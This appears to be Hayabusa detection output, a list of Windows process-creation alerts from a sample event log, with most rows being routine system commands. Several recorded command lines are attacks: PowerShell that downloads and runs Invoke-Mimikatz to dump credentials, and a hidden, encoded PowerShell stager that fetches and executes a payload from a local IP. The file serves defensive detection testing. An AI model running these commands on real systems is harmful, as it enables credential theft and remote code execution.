+2016-08-25 07:53:47.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:54:04.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:59:07.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:05.916 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:06.884 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:06.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:25.697 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:23:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:25:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:38:00.158 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:43:45.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:43:48.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:44:06.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:46:45.647 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:58:45.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:58:46.850 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB3AEMAPQBOAGUAVwAtAE8AQgBKAGUAYwBUACAAUwB5AHMAVABlAG0ALgBOAEUAdAAuAFcARQBiAEMATABpAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABFAEEARABlAHIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAG8AWABZACAAPQAgAFsAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBCAFIARQBxAHUAZQBTAFQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwBYAHkAOwAkAHcAQwAuAFAAUgBvAHgAWQAuAEMAUgBlAEQARQBOAHQASQBBAEwAUwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAFQALgBDAHIAZQBEAEUAbgBUAGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4ARQB0AHcATwByAGsAQwBSAEUARABFAE4AdABpAGEATABzADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMAaABhAFIAWwBdAF0AJABiAD0AKABbAGMASABBAFIAWwBdAF0AKAAkAFcAYwAuAEQATwB3AG4ATABPAEEAZABTAFQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAGcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8ASQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 06:11:59.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 07:17:58.251 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 07:17:58.259 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:50.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:50.394 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:51.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:51.099 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:36:35.595 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:38:39.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:38:44.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:38:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:54:34.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:54:34.019 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:54:34.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:56:33.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 09:49:33.186 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 09:49:33.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:20:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:20:56.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:20:57.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:20:57.955 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:21:00.750 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:21:00.752 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:21:00.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:22:11.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:22:11.319 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:37.371 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-28 00:31:37.402 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
